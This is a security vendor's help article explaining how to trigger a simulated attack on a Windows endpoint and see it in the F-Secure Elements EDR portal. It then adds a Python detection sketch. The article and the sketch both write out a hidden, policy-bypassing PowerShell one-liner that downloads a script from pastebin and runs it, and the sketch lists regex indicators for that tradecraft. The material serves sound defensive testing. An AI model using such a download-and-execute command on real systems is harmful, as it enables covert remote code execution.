You can use this test to view what an advanced attack in the organization network may look like in the F-Secure Elements Endpoint Detection and Response portal.

For this test, you need:

  • a Windows workstation that is running the Sensor, and
  • access to the F-Secure Elements Endpoint Detection and Response portal.

Note: We recommend that you run all attack simulations in isolated test environments, for example with disposable virtual machines.

In this test, you create a .bat file that uses Windows PowerShell to download code from a third-party website. This example downloads the following harmless code from pastebin.com:

# Filename: Hello.ps1
Write-Host
Write-Host 'Hello World!'
Write-Host
# end of script

To run the test, follow these instructions:

    1. Log in to the monitored endpoint where you have deployed the sensor.
    2. Open the Notepad text editor.
    3. Add the following command on one line:

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://pastebin.com/raw/gRvH8a8z',\"$env:temp\powershell.ps1\"); Powershell.exe -executionpolicy remotesigned -File $env:Temp\powershell.ps1

    4. Save the file as hello-world.bat.
    5. Run the .bat file on the endpoint.
    6. Log out from the monitored endpoint.
    7. Log in to the F-Secure Elements Endpoint Detection and Response portal.
    8. View the recent Broad Context Detections.

The detection generated by the test should appear in the list of recent Broad Context Detections.
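As an added illustration (not part of the F-Secure article and not the Elements EDR detection logic), the following Python sketch scores process-creation command lines against the traits the simulated command above exhibits, so you can see which parts of the test an analyst or a rule would key on. The indicator names, the threshold and the sample events are constructed for this example.

```python
import re

# Indicators drawn from the traits of the simulated command on this page.
# The names and the threshold are this example's own choices, not the
# F-Secure Elements EDR detection logic.
INDICATORS = {
    "hidden_window":      re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "exec_policy_bypass": re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I),
    "non_interactive":    re.compile(r"-NonI(?:nteractive)?\b", re.I),
    "no_profile":         re.compile(r"-NoP(?:rofile)?\b", re.I),
    "invoke_expression":  re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "web_download":       re.compile(r"Net\.WebClient|Download(?:File|String)", re.I),
    "script_in_temp":     re.compile(r"\$env:temp\\[^\s\"']+\.ps1", re.I),
}


def score_command_line(cmdline: str) -> tuple[int, list[str]]:
    """Return how many indicators a command line matches, and which ones."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return len(hits), hits


def triage(events: list[dict], threshold: int = 3) -> list[dict]:
    """Flag process-creation events whose command line meets the threshold.

    A single indicator (e.g. -NoProfile, or a script under %TEMP%) is common
    in legitimate administration; it is the combination that stands out.
    """
    flagged = []
    for ev in events:
        count, hits = score_command_line(ev["cmdline"])
        if count >= threshold:
            flagged.append({"pid": ev["pid"], "score": count, "indicators": hits})
    return flagged


# Constructed sample events (not real telemetry). The first is the command
# line from this page's test; the other two are ordinary PowerShell use.
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": r'''"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://pastebin.com/raw/gRvH8a8z',"$env:temp\powershell.ps1");'''},
    {"pid": 4121, "cmdline": r"Powershell.exe -executionpolicy remotesigned -File $env:Temp\powershell.ps1"},
    {"pid": 5002, "cmdline": r"powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The second event, the child PowerShell launched by the first, matches only one indicator on its own, which is why real detections correlate parent and child processes rather than judging each command line in isolation.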

Source: Official F-Secure Brand
Edited by: BEST Antivirus KBS Team
